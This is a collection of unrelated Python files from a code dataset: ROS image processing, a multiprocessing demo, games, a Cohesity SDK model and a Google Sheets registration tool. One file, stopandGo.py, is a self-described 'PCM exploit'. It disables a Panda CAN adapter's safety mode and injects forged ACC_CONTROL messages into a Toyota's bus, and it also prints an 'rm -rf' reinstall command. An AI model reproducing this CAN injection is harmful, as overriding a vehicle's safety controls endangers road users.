self.status = False\n self.EFD_publisher = rospy.Publisher('EFD_constants', FloatArray, queue_size= 1)\n self.Pose_publisher = rospy.Publisher('Frame_Pose', Pose, queue_size=1)\n self.EFD_msg = FloatArray()\n\n self.EFD_Calculator = EFD_Calculator(5)\n self.bridge = CvBridge()\n self.minBlobSize = rospy.get_param(\"min blob size\")\n self.maxAutofillSize = rospy.get_param(\"max autofill size\")\n\n rospy.Subscriber('acquired_image', Image, self.ProcessImage)\n\n # create thread\n self.feed_thread = Thread(target=self.FCD, args=())\n self.feed_thread.daemon = True\n self.feed_thread.start()\n rospy.loginfo(\"Thread created\")\n # FPS setup\n self.FPS = 1 / 
(rospy.get_param('Desired_FPS'))\n self.FPS_MS = int(self.FPS * 1000)\n rospy.loginfo(\"FPS constants set\")\n\n self.waitkeyval = 20\n\n #if not rospy.get_param('use Gazebo cam'):\n # self.use_camera = rospy.get_param('use camera')\n # if self.use_camera:\n # self.waitkeyval = 20\n # else:\n # self.waitkeyval = 1\n\n\n while not rospy.is_shutdown():\n try:\n self.display_frame()\n except AttributeError:\n rospy.loginfo(\"Error, may be temporary\")\n pass\n\n\n\n def FCD(self):\n pose = self.GetPose()\n if self.status:\n gray_img = cv2.cvtColor(self.frame, cv2.COLOR_BGR2GRAY)\n self.bin_img = self.filter_image(gray_img)\n self.update_max_cnt()\n FCD_Coeffs = self.EFD_Calculator.calc_coeffs(self.max_contour)\n self.calc_cMax(FCD_Coeffs)\n print(FCD_Coeffs)\n self.EFD_msg.data = self.format_EFD_message_data(FCD_Coeffs)\n self.Pose_publisher.publish(pose)\n self.EFD_publisher.publish(self.EFD_msg)\n rospy.loginfo(\"New frame published\")\n #self.cont_frame = self.bin_img\n time.sleep(self.FPS)\n\n def calc_cMax(self, coeffs):\n N = np.stack((coeffs[2], coeffs[3]))\n C = np.linalg.norm(N, axis=0)\n C_max = sp.signal.argrelextrema(C, np.greater)\n print(\"******\")\n print(\"******\")\n print(\"C max vals: \")\n print(C_max)\n\n def format_EFD_message_data(self, coeffs):\n return coeffs\n\n def update_max_cnt(self):\n # Get max contour\n contours = cv2.findContours(self.bin_img.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n contours = imutils.grab_contours(contours)\n closed_contours = []\n for i in contours:\n if cv2.contourArea(i) > cv2.arcLength(i, True):\n closed_contours.append(i)\n self.max_contour = max(closed_contours, key=cv2.contourArea)\n out = np.zeros(self.bin_img.shape, np.uint8)\n cv2.drawContours(out, [self.max_contour], -1, 255, cv2.FILLED)\n bin_mask = cv2.bitwise_and(self.bin_img, out)\n\n masked_img = cv2.bitwise_and(self.frame, self.frame, mask = bin_mask)\n\n\n # calc center of contour\n M = cv2.moments(self.max_contour)\n cX = int(M[\"m10\"] / M[\"m00\"])\n cY = int(M[\"m01\"] / M[\"m00\"])\n\n # draw contour and center\n cv2.drawContours(masked_img, [self.max_contour], -1, (0, 255, 0), 2)\n cv2.circle(masked_img, (cX, cY), 7, (255, 255, 255), -1)\n cv2.putText(masked_img, \"center\", (cX - 20, cY - 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2)\n self.cont_frame = masked_img\n\n\n def convert_to_cv2(self, data):\n rospy.loginfo(\"image received\")\n self.frame = self.bridge.imgmsg_to_cv2(data, desired_encoding='passthrough')\n\n\n def ProcessImage(self, data):\n self.convert_to_cv2(data)\n self.status = True\n self.FCD()\n\n def GetPose(self):\n return Pose()\n\n def filter_image(self,img):\n bin_img = color.rgb2gray(img)\n #bin_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # Adaptive threshold -> binary image\n gray_bi = cv2.medianBlur(bin_img, 5)\n #gray_bi = cv2.GaussianBlur(img, (5,5), 0)\n #gray_bi = cv2.threshold(gray_bi, 60, 255, cv2.THRESH_BINARY)[1]\n gray_bi = cv2.adaptiveThreshold(gray_bi, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 25, 3)\n gray_bi_array = np.array(gray_bi)\n\n gray_size_filtered = gray_bi_array == 0\n\n #filter noise, fill gaps, and close contours\n gray_size_filtered = morphology.remove_small_objects(gray_size_filtered, min_size=self.minBlobSize)\n gray_size_filtered = morphology.remove_small_holes(gray_size_filtered, self.maxAutofillSize)\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(9,9))\n gray_size_filtered = gray_size_filtered.astype(np.uint8) # convert to an unsigned byte\n gray_size_filtered *= 
255\n\n gray_size_filtered = cv2.morphologyEx(gray_size_filtered, cv2.MORPH_CLOSE, kernel)\n # blob fill in\n bi_filled = gray_size_filtered.copy()\n h, w = gray_size_filtered.shape[:2]\n mask = np.zeros((h + 2, w + 2), np.uint8)\n cv2.floodFill(bi_filled, mask, (0, 0), 255)\n bi_filled_inv = cv2.bitwise_not(bi_filled)\n final = gray_size_filtered | bi_filled_inv\n return final\n\n def display_frame(self):\n \"\"\"\n updates the view windows so the user can observe\n \"\"\"\n try:\n cv2.imshow('frame',self.cont_frame)\n cv2.waitKey(self.waitkeyval)\n except:\n rospy.loginfo(\"No frame\")\n\n\n\nif __name__ == '__main__':\n imageProcessor = image_processor()\n rospy.spin()\n \n\n","sub_path":"src/grasppoints/src/image_processor.py","file_name":"image_processor.py","file_ext":"py","file_size_in_byte":6324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"21510704","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n# file_name: new_mul.py\n# author: ScCcWe\n# time: 2020/4/27 9:27\nimport os\nimport sys\nfrom multiprocessing import Pool, cpu_count\nimport functools\nfrom colorama import Back, init\n\nif 'win' in sys.platform:\n path_route_format = '\\\\'\nelse:\n path_route_format = '/'\n\ndo_file_path_list = []\ninit(autoreset=True) # in windows\n\n\ndef divide_work_list(func):\n @functools.wraps(func)\n def divide_func(*args):\n tasks_list = func(*args)\n num = cpu_count() if len(tasks_list) > cpu_count() else 2\n # print(num)\n # print(len(tasks_list) / num)\n # print(len(tasks_list) % num)\n # case: the tasks divide evenly among the workers\n if len(tasks_list) % num == 0:\n div_num = int(len(tasks_list) / num)\n return [tasks_list[i:i + div_num] for i in range(0, len(tasks_list), div_num)], num\n \n # case: the tasks cannot be divided evenly\n # e.g. 9/4 = 2.25, div_num = 2, [] -> [ab][ab][ab][abc]\n else:\n div_num = int(len(tasks_list) / num)\n need_list = [tasks_list[i:i + div_num] for i in range(0, len(tasks_list[div_num * 2:]), div_num)]\n need_last_list = tasks_list[div_num * 3:]\n need_list.append(need_last_list)\n return need_list, num\n return divide_func\n\n\n@divide_work_list\ndef get_task_list(root_path):\n task_list = get_all_list(root_path)\n assert len(task_list) >= 2, 'the selected root_path is empty!'\n return task_list\n\n\ndef get_all_list(par_path):\n for file_or_dir in os.listdir(par_path):\n par_path_new = par_path + path_route_format + file_or_dir\n if os.path.isdir(par_path_new):\n get_all_list(par_path_new)\n elif os.path.isfile(par_path_new):\n do_file_path_list.append(par_path_new)\n return do_file_path_list\n\n\ndef main_process(root_path):\n list_divided, cpu_num = get_task_list(root_path)\n print(Back.WHITE + \"Pending \" + Back.GREEN + \"task queue\" + Back.WHITE + \" is as follows:\")\n print(list_divided)\n with Pool(processes=cpu_num) as p:\n for i in range(cpu_num):\n p.apply_async(single_process_worker, args=(list_divided[i], ...))\n \n p.close() # stop submitting new tasks to the pool; worker processes exit once all tasks are done\n p.join() # wait for the worker processes to finish; close() or terminate() must be called before join()\n\n\n# the work each single worker process has to complete\ndef single_process_worker():\n ...\n\n\nif __name__ == '__main__':\n main_process(root_path=r'C:\Users\hwx827939\Desktop\pic')\n","sub_path":"内置方法/多进程/多进程/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"380540818","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nf = lambda x : x**2 - 4*x +6\r\nx = np.linspace(-1,6,100)\r\ny = f(x)\r\ngradient = lambda x:2*x -4\r\nx2 = 10\r\nx0 = 0.0\r\nMaxIter = 
10\r\nlearning_rate = 0.4\r\nfor i in range(MaxIter):\r\n g = gradient(x2)\r\n b = f(x2)-x2*g\r\n jub = lambda x: x*g+b\r\n y2 = jub(x)\r\n plt.plot(x,y,'-k')\r\n plt.plot(2,2,'sk')\r\n plt.plot(x,y2)\r\n plt.grid()\r\n plt.xlabel('x')\r\n plt.ylabel('y')\r\n plt.show()\r\n x2 = x2 - (f(x2)/gradient(x2))\r\n\r\n\r\n\r\nprint(\"step\\tx\\tf(x)\")\r\nprint(\"{:02d}\\t{:6.5f}\\t{:6.5f}\".format(0,x0,f(x0)))\r\nfor i in range(MaxIter):\r\n x1 = x0-learning_rate*gradient(x0)\r\n x0 = x1\r\n print(\"{:02d}\\t{:6.5f}\\t{:6.5f}\".format(i+1,x0,f(x0)))\r\n","sub_path":"keras/경사하강법시각화.py","file_name":"경사하강법시각화.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"399332011","text":"#!/usr/bin/env python3\nimport sys\nimport os\nfrom panda import Panda\nfrom opendbc.can.packer import CANPacker\n\n\nmax = 500 # increase this if u need more time to start car engine\ndbc_name ='toyota_nodsu_hybrid_pt_generated' # put you correct odbc here (search in values.py)\n\np = Panda()\np.set_safety_mode(Panda.SAFETY_ALLOUTPUT)\n\ndumpsafety = p.health()\nif dumpsafety['safety_mode'] == 0:\n print('Sorry, u need change for some dev branch, if u deserv this copy and past this command:\\n\\n\\ncd ..; rm -rf openpilot; git clone -b master --recurse-submodules https://github.com/commaai/openpilot; reboot')\n exit(1)\n\npacker = CANPacker(dbc_name)\nvalues = {\n \"ACC_TYPE\": 1,\n}\ndata = packer.make_can_msg(\"ACC_CONTROL\", 0, values) # maybe u need change this ACC_CONTROL confirm in your odbc\n\ndef main():\n\n for i in range (0, max):\n print(f\"PCM exploit :{data}\")\n print(' __ __ .___\\n/ \\ / \\ ____ ____ ____ ____ __| _/\\n\\ \\/\\/ // __ \\ / \\_/ __ \\_/ __ \\ / __ | \\n \\ /\\ ___/ | | \\ ___/\\ ___// /_/ | \\n \\__/\\ / \\___ > |___| /\\___ >\\___ >____ | \\n \\/ \\/ \\/ \\/ \\/ \\/ \\n _________ ________ \\n / _____/ ____ / _____/ \\n \\_____ \\ / \\/ \\ ___ \\n / \\ | \\ \\_\\ \\\\\\n/_______ /___| /\\______ /\\n \\/ \\/ \\/ \\n')\n p.can_send(data[0], data[2], data[3])\n progress(i, max, 'start your engine before reach the end')\n if i < (max - 1) :\n os.system('clear')\n \n p.set_safety_mode(Panda.SAFETY_TOYOTA)\n p.send_heartbeat()\n print('\\n\\n\\nrelay ON again\\nkthxbay\\n')\n\n\ndef progress(count, total, status=''):\n bar_len = 50\n filled_len = int(round(bar_len * count / float(total)))\n\n bar = '#' * filled_len + '.' 
* (bar_len - filled_len)\n\n sys.stdout.write('count :%s of max :%s\\n [%s] \\n...%s' % (count, total, bar, status))\n\nmain()\n","sub_path":"stopandGo.py","file_name":"stopandGo.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"624991393","text":"# -*- coding: utf-8 -*-\n# Copyright 2020 Cohesity Inc.\n\nimport cohesity_management_sdk.models.aws_kms_configuration\nimport cohesity_management_sdk.models.cryptsoft_kms_configuration\n\nclass KmsCreateRequestParameters(object):\n\n \"\"\"Implementation of the 'KmsCreateRequestParameters' model.\n\n Request to create a KMS with specified configuration.\n\n Attributes:\n aws_kms (AwsKmsConfiguration): AWS KMS conifg.\n cryptsoft_kms (CryptsoftKmsConfiguration): Cryptsoft KMS config.\n id (int): The Id of a KMS server.\n server_name (string): Specifies the name given to the KMS Server.\n server_type (ServerTypeKmsCreateRequestParametersEnum): Specifies the\n type of key mangement system.\n 'kInternalKms' indicates an internal KMS object.\n 'kAwsKms' indicates an Aws KMS object.\n 'kCryptsoftKms' indicates a Cryptsoft KMS object.\n\n \"\"\"\n\n # Create a mapping from Model property names to API property names\n _names = {\n \"aws_kms\": 'awsKms',\n \"cryptsoft_kms\": 'cryptsoftKms',\n \"id\": 'id',\n \"server_name\": 'serverName',\n \"server_type\":'serverType'\n }\n\n def __init__(self,\n aws_kms=None,\n cryptsoft_kms=None,\n id=None,\n server_name=None,\n server_type=None):\n \"\"\"Constructor for the KmsCreateRequestParameters class\"\"\"\n\n # Initialize members of the class\n self.aws_kms = aws_kms\n self.cryptsoft_kms = cryptsoft_kms\n self.id = id\n self.server_name = server_name\n self.server_type = server_type\n\n @classmethod\n def from_dictionary(cls,\n dictionary):\n \"\"\"Creates an instance of this model from a dictionary\n\n Args:\n dictionary (dictionary): A dictionary representation of the object as\n obtained from the deserialization of the server's response. 
The keys\n MUST match property names in the API description.\n\n Returns:\n object: An instance of this structure class.\n\n \"\"\"\n if dictionary is None:\n return None\n\n # Extract variables from the dictionary\n aws_kms = cohesity_management_sdk.models.aws_kms_configuration.AwsKmsConfiguration.from_dictionary(dictionary.get('awsKms')) if dictionary.get('awsKms') else None\n cryptsoft_kms = cohesity_management_sdk.models.cryptsoft_kms_configuration.CryptsoftKmsConfiguration.from_dictionary(dictionary.get('cryptsoftKms')) if dictionary.get('cryptsoftKms') else None\n id = dictionary.get('id')\n server_name = dictionary.get('serverName')\n server_type = dictionary.get('serverType')\n\n # Return an object of this model\n return cls(aws_kms,\n cryptsoft_kms,\n id,\n server_name,\n server_type)\n\n\n","sub_path":"cohesity_management_sdk/models/kms_create_request_parameters.py","file_name":"kms_create_request_parameters.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"346560054","text":"#!/usr/bin/env python3\n# Python 3.6\n\nimport hlt\nimport time\nimport ptvsd\nimport random\nimport logging\nimport numpy as np\nfrom hlt import constants\nfrom hlt.positionals import Direction\nfrom hlt.entity import Shipyard, Dropoff\n\nclass MyBot:\n\n def __init__(self):\n self.game = hlt.Game()\n\n self.height = self.game.game_map.height\n self.width = self.game.game_map.width\n\n #Initialize settings for different board sizes\n if self.height == 64:\n self.num_steps = 500\n self.offset = 0\n elif self.height == 50:\n self.num_steps = 475\n self.offset = 7\n elif self.height == 40:\n self.num_steps = 425\n self.offset = 12\n else:\n self.num_steps = 400\n self.offset = 16\n \n ptvsd.enable_attach(address=('localhost', 5678))\n ptvsd.wait_for_attach()\n\n #Board info\n self.halite_locations = np.zeros((64,64))\n self.steps_remaining = np.zeros((64,64))\n #My global info\n self.my_ships = np.zeros((64,64))\n self.my_halite = np.zeros((64,64))\n self.dropoffs = np.zeros((64,64))\n self.score = np.zeros((64,64))\n #My current unit info\n self.unit_halite = np.zeros((64,64))\n self.current_unit = np.zeros((64,64))\n #Enemy global info\n #TODO: Generalize for 2 and 4 players\n self.enemy_ships = np.zeros((64,64))\n self.enemy_halite = np.zeros((64,64))\n self.enemy_score = np.zeros((64,64))\n \n self.game.ready(\"MyPythonBot\")\n logging.info(\"Successfully created bot! My Player ID is {}.\".format(self.game.my_id))\n\n def buildInputs(self, cells):\n\n for row in cells:\n for cell in row:\n x = self.offset + cell.position.x\n y = self.offset + cell.position.y\n self.halite_locations[x][y] = cell.halite_amount\n\n #Note: both dropoffs and shipyards count as \"Dropoffs\"\n if cell.has_structure:\n if cell.structure.owner == self.game.my_id:\n self.dropoffs[x][y] = 1\n else:\n #TODO: Do we care about enemy dropoffs?\n pass\n\n if cell.is_occupied:\n if cell.ship.owner == self.game.my_id:\n self.my_ships[x][y] = 1\n self.my_halite[x][y] = cell.ship.halite_amount\n else:\n self.enemy_ships[x][y] = 2\n self.enemy_halite[x][y] = cell.ship.halite_amount\n\n self.score = np.full((64,64), self.game.me.halite_amount)\n self.steps_remaining = np.full((64,64), self.num_steps - self.game.turn_number + 1)\n\n for id, player in self.game.players.items():\n if id != self.game.my_id:\n self.enemy_score = np.full((64,64), player.halite_amount)\n\n\n\n\n def run(self):\n\n while True:\n # This loop handles each turn of the game. 
The game object changes every turn, and you refresh that state by\n # running update_frame().\n self.game.update_frame()\n # You extract player metadata and the updated map metadata here for convenience.\n me = self.game.me\n game_map = self.game.game_map\n\n self.buildInputs(game_map._cells)\n\n # A command queue holds all the commands you will run this turn. You build this list up and submit it at the\n # end of the turn.\n command_queue = []\n\n for ship in me.get_ships():\n # For each of your ships, move randomly if the ship is on a low halite location or the ship is full.\n # Else, collect halite.\n logging.info(ship.position)\n if game_map[ship.position].halite_amount < constants.MAX_HALITE / 10 or ship.is_full:\n command_queue.append(\n ship.move(\n random.choice([ Direction.North, Direction.South, Direction.East, Direction.West ])))\n else:\n command_queue.append(ship.stay_still())\n\n # If the game is in the first 200 turns and you have enough halite, spawn a ship.\n # Don't spawn a ship if you currently have a ship at port, though - the ships will collide.\n if self.game.turn_number <= 200 and me.halite_amount >= constants.SHIP_COST and not game_map[me.shipyard].is_occupied:\n command_queue.append(me.shipyard.spawn())\n\n # Send your moves back to the game environment, ending this turn.\n self.game.end_turn(command_queue)\n\n\nif __name__ == '__main__':\n bot = MyBot()\n bot.run()\n","sub_path":"MyBot.py","file_name":"MyBot.py","file_ext":"py","file_size_in_byte":4804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"528996553","text":"import pprint\n\nbirthdays = {'Alice': 'Apr 1', 'Bob': 'Dec 12', 'Carol': 'Mar 4'}\n\nwhile True:\n print('Enter a name: (blank to quit)')\n name = input()\n if name == '':\n break\n if name in birthdays:\n print(birthdays[name] + ' is the birthday of ' + name)\n else:\n print('I do not have birthday information for ' + name)\n print('What is their birthday?')\n bday = input()\n birthdays[name] = bday\n print('Birthday database updated.')\nfor name in birthdays.keys():\n print(name)\nfor value in birthdays.values():\n print(value)\nfor items in birthdays.items():\n print(items)\nmessage = 'It was a bright cold day in April, and the clocks were striking thirteen.'\ncount = {}\nfor character in message:\n count.setdefault(character, 0)\n count[character] = count[character] + 1\npprint.pprint(count)","sub_path":"Py_function/dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"463497285","text":"import pygame\r\nfrom pygame.locals import *\r\n\r\nfrom OpenGL.GL import *\r\nfrom OpenGL.GLU import *\r\n\r\nvertices = (\r\n # ( x, y, z)\r\n ( 1, -1, -1), # A\r\n ( 1, 1, -1), # B\r\n (-1, 1, -1), # C\r\n (-1, -1, -1), # D\r\n ( 1, -1, 1), # E\r\n ( 1, 1, 1), # F\r\n (-1, -1, 1), # G\r\n (-1, 1, 1) # H\r\n)\r\n\r\nedges = (\r\n (0, 1),\r\n (0, 3),\r\n (0, 4),\r\n (2, 1),\r\n (2, 3),\r\n (2, 7),\r\n (6, 3),\r\n (6, 4),\r\n (6, 7),\r\n (5, 1),\r\n (5, 4),\r\n (5, 7)\r\n)\r\n\r\nsurfaces = (\r\n (0, 1, 2, 3),\r\n (3, 2, 7, 6),\r\n (6, 7, 5, 4),\r\n (4, 5, 1, 0),\r\n (1, 5, 7, 2), \r\n (4, 0, 3, 6)\r\n)\r\n\r\ncolor = (\r\n (1, 0, 0),\r\n (0, 1, 0),\r\n (0, 0, 0),\r\n (0, 0, 1),\r\n (1, 1, 1),\r\n (0, 1, 1),\r\n (1, 0, 0),\r\n (0, 1, 0),\r\n (0, 0, 1),\r\n (0, 1, 0),\r\n (0, 0, 1),\r\n (0, 0, 0)\r\n)\r\n\r\ndef Cube():\r\n glBegin(GL_QUADS)\r\n for surface in surfaces:\r\n x 
= 0\r\n glColor3fv((1, 0, 0))\r\n for vertex in surface:\r\n x += 1\r\n glColor3fv(color[x])\r\n glVertex3fv(vertices[vertex])\r\n glEnd()\r\n\r\n glBegin(GL_LINES)\r\n glColor3fv((0, 0.9, 0))\r\n for edge in edges:\r\n for vertex in edge:\r\n glVertex3fv(vertices[vertex])\r\n glEnd()\r\n\r\n\r\ndef main():\r\n pygame.init()\r\n screen = pygame.display.set_mode((800, 600), DOUBLEBUF | OPENGL)\r\n\r\n gluPerspective(45, (800 / 600), 0.1, 50)\r\n glTranslatef(0, 0, -40)\r\n glRotatef(0, 0, 0, 0)\r\n\r\n object_passed = False\r\n move_x = 0\r\n move_y = 0\r\n\r\n while not(object_passed):\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:\r\n move_x = 0.5\r\n if event.key == pygame.K_RIGHT:\r\n move_x = -0.5\r\n if event.key == pygame.K_UP:\r\n move_y = -0.5\r\n if event.key == pygame.K_DOWN:\r\n move_y = 0.5\r\n\r\n if event.type == pygame.KEYUP:\r\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\r\n move_x = 0\r\n if event.key == pygame.K_UP or event.key == pygame.K_DOWN:\r\n move_y = 0 # reset vertical movement on key release\r\n\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n if event.button == 4:\r\n glTranslatef(0, 0, -5)\r\n if event.button == 5:\r\n glTranslatef(0, 0, 5)\r\n\r\n x = glGetDoublev(GL_MODELVIEW_MATRIX)\r\n coord = [[c for c in r] for r in x]\r\n # print(coord)\r\n\r\n camera_x = coord[3][0]\r\n camera_y = coord[3][1]\r\n camera_z = coord[3][2]\r\n # print(\"x =\", camera_x, \"y =\", camera_y, \"z =\", camera_z)\r\n\r\n if camera_z < -1:\r\n object_passed = True\r\n\r\n # glRotatef(1, 1, 1, 1)\r\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\r\n glTranslatef(move_x, move_y, 0.5)\r\n Cube()\r\n pygame.display.flip()\r\n pygame.time.wait(10)\r\n\r\nfor i in range(10):\r\n main()\r\n glLoadIdentity()\r\n","sub_path":"VMC Pygame/VMC Pygame - Class/VMC Pygame - Class 17/VMC Pygame - Class 17.py","file_name":"VMC Pygame - Class 17.py","file_ext":"py","file_size_in_byte":3159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"78645697","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 8 16:18:52 2019\r\n\r\nDo some higher order things with the sheet:\r\n - make a summary sheet\r\n - email \r\n\r\nhttps://developers.google.com/sheets/api/samples/reading\r\n\r\n@author: sjgte\r\n\"\"\"\r\n\r\n#import SOMREG_readwrite as rw\r\nimport pandas as pd\r\nimport numpy as np\r\nimport SOMREG_LowOrdSubFun as lsf\r\nfrom tkinter import messagebox\r\n\r\n#%% dump columns back in the forms (what was added was at the end)\r\ndef dumpcolumns(alldata, SheetA, nameSht, rangest='A1'):\r\n # write in json format > easy for columns\r\n bod = {'values':[alldata]}\r\n \r\n SheetA['serv'].spreadsheets().values().update(spreadsheetId=SheetA['ID'], range= nameSht + '!' + rangest + ':Z2000',\r\n valueInputOption = 'RAW', body = bod).execute()\r\n\r\n#%% dump what is currently in alldata back into the form responses\r\ndef dumpdata(alldata, SheetA, nameSht, rangest='A1'):\r\n # first do the columns\r\n col = alldata.columns\r\n col = col.values.tolist()\r\n # write in json format\r\n listv = alldata.values.tolist()\r\n listv = [col] + listv\r\n bod = {'values':listv} \r\n SheetA['serv'].spreadsheets().values().update(spreadsheetId=SheetA['ID'], range= nameSht + '!' 
+ rangest + ':Z2000',\r\n valueInputOption = 'RAW', body = bod).execute()\r\n\r\n#%% check if the form has the relevant columns and initialize orderwise\r\ndef checkFormAndInit(SheetA, nameSht, rowv=1): \r\n val = lsf.readandprint(SheetA,nameSht+'!A' + str(rowv) + ':Z' + str(rowv),0)\r\n\r\n # check if columns are present\r\n NeededColumns = ['Registration Type','Email Address', 'Role(s)','Full Name']\r\n MissingColumns = []\r\n for colnm in NeededColumns:\r\n if (colnm in val[0]) == False:\r\n MissingColumns.append(colnm)\r\n \r\n if len(MissingColumns)>0:\r\n messagebox.showinfo('Title', 'Form Mistake, missing entries:' + '/'.join(MissingColumns) + '\\n\\n ALSO CHECK SPACES')\r\n else: \r\n # add columns that are not in the form but manually added\r\n ColumnsToAddIfMissing = ['Confirmation sent?','Confirmed as','Waitlisted?','Bank or cash?','Amount','Notes']\r\n for colnm in ColumnsToAddIfMissing:\r\n if (colnm in val[0]) == False:\r\n val[0].append(colnm)\r\n # dump all back in form\r\n dumpcolumns(val[0], SheetA, nameSht)\r\n \r\n#%% provides a summary sheet\r\ndef sumSheet(SheetA, alldata):\r\n # print basics:\r\n # new sheet if needed\r\n if lsf.getnamesh(SheetA['sheetinfo'],1) != 'Summary':\r\n req = {\"requests\": [{\"addSheet\": { \"properties\": {\r\n \"title\": \"Summary\", \"gridProperties\": {\"rowCount\": 20,\"columnCount\": 12}}}}]} \r\n request = SheetA['serv'].spreadsheets().batchUpdate(spreadsheetId=SheetA['ID'], body=req)\r\n request.execute() \r\n \r\n # summary for the registration\r\n Type = ['Lead', 'Follow','Couple','Ambi']\r\n Conf = ['yes', 'no']\r\n Val = ['Student', 'Regular','Other','All'] \r\n \r\n # write the basic body\r\n bod = {'values':[['Summary ' + lsf.getnow()],\r\n ['','']+Type,\r\n ['Confirmed']+[Val[0]],\r\n ['']+[Val[1]],\r\n ['']+[Val[2]],\r\n ['']+[Val[3]],\r\n [''],\r\n ['NonConfirmed']+[Val[0]],\r\n ['']+[Val[1]],\r\n ['']+[Val[2]],\r\n ['']+[Val[3]]]}\r\n SheetA['serv'].spreadsheets().values().update(spreadsheetId=SheetA['ID'], range='Summary!A1:F20',\r\n valueInputOption = 'RAW', body = bod).execute()\r\n \r\n # assumed that Ccnt is the highest level. The rest gets counted in... 
\r\n alldata = lsf.readtoDF(SheetA, lsf.getnamesh(SheetA['sheetinfo'],0))\r\n \r\n val = {'values': [[] for i in range(20)]}\r\n for Ccnt,Cval in enumerate(Conf):\r\n C = alldata[alldata['Confirmation sent?'].str.contains(Cval)==True]\r\n for Tcnt, Tval in enumerate(Type):\r\n if Cval == 'yes':\r\n CT = C[C['Confirmed as'].str.contains(Tval)==True]\r\n else:\r\n CT = C[C['Role(s)'].str.contains(Tval)==True]\r\n for Vcnt, Vval in enumerate(Val):\r\n if Vval == 'All':\r\n CTV = CT\r\n elif Vval == 'Other':\r\n searchfor = ['Student','Regular']\r\n CTV = CT[~CT['Registration Type'].str.contains('|'.join(searchfor))]\r\n else:\r\n CTV = CT[CT['Registration Type'].str.contains(Vval)==True] \r\n val['values'][len(Val)*Ccnt+Vcnt] = val['values'][len(Val)*Ccnt+Vcnt] + [len(CTV)] \r\n val['values'].insert(len(Val),[''])\r\n colv = lsf.checkcol(SheetA,'Summary',Type[0],2) \r\n \r\n # for confirmed make summary of final amount of couples and extras:\r\n allconf = val['values'][Conf.index('yes')*4+Val.index('All')]\r\n leadfol = [allconf[Type.index('Lead')]]+[allconf[Type.index('Follow')]]\r\n lfname = ['Lead','Follow']\r\n index_min = np.argmin(leadfol)\r\n index_max = np.argmax(leadfol) \r\n TotCop = leadfol[index_min]+allconf[Type.index('Couple')]\r\n TotAmbi = allconf[Type.index('Ambi')]\r\n \r\n val['values'][len(Val)*len(Conf)+len(Conf)].append('Totals Confirmed:')\r\n val['values'][len(Val)*len(Conf)+len(Conf)+1].append('Couples:')\r\n val['values'][len(Val)*len(Conf)+len(Conf)+1].append(TotCop)\r\n val['values'][len(Val)*len(Conf)+len(Conf)+2].append('Extra '+lfname[index_max])\r\n val['values'][len(Val)*len(Conf)+len(Conf)+2].append(leadfol[index_max]-leadfol[index_min])\r\n val['values'][len(Val)*len(Conf)+len(Conf)+3].append('Ambis')\r\n val['values'][len(Val)*len(Conf)+len(Conf)+3].append(TotAmbi) \r\n \r\n relout = {'ConfirmedCouples': TotCop, \r\n 'Extras': leadfol[index_max]-leadfol[index_min], 'ExtraRole': lfname[index_max],\r\n 'Ambis':TotAmbi}\r\n \r\n # write to excel sheet \r\n SheetA['serv'].spreadsheets().values().update(spreadsheetId=SheetA['ID'], range='Summary!' 
+ colv + '3:Z100',\r\n valueInputOption = 'RAW', body=val).execute()\r\n \r\n ## summary for the financing \r\n Reg = ['Student','Regular','Other','All'] \r\n Payment = ['B','C','NONE']\r\n\r\n # write the basic body\r\n bod = {'values':[['Numbers'],\r\n ['']+Payment,\r\n [Reg[0]],\r\n [Reg[1]],\r\n [Reg[2]],\r\n [Reg[3]],\r\n [''],\r\n [''],\r\n ['Amounts'],\r\n ['']+Payment,\r\n [Reg[0]],\r\n [Reg[1]],\r\n [Reg[2]],\r\n [Reg[3]]]}\r\n SheetA['serv'].spreadsheets().values().update(spreadsheetId=SheetA['ID'], range='Summary!I2:O20',\r\n valueInputOption = 'RAW', body = bod).execute()\r\n \r\n inxT = []\r\n Payv = []\r\n TotAmount = []\r\n val = {'values': [[] for i in range(20)]}\r\n for Rcnt,Rval in enumerate(Reg):\r\n if Rval == 'Other': # nondefined\r\n inxT.append(list(np.array(inxT).sum(0)==0))\r\n elif Rval == 'All':\r\n inxT.append([True for it in range(0,len(inxT[-1]))])\r\n else:\r\n inxT.append(list(alldata['Registration Type'].str.contains(Rval)==True)) \r\n\r\n # get the amount that should have been paid (ONLY WORKS FOR INTEGERS NOW!)\r\n pv = list(alldata['Registration Type'][inxT[-1]])\r\n if len(pv)>0:\r\n numinx = [char for char in pv[0] if char.isdigit()==True]\r\n if len(numinx)>0:\r\n Payv.append(int(''.join(numinx)))\r\n else:\r\n Payv.append('?')\r\n else:\r\n Payv.append('?')\r\n for Pcnt, Pval in 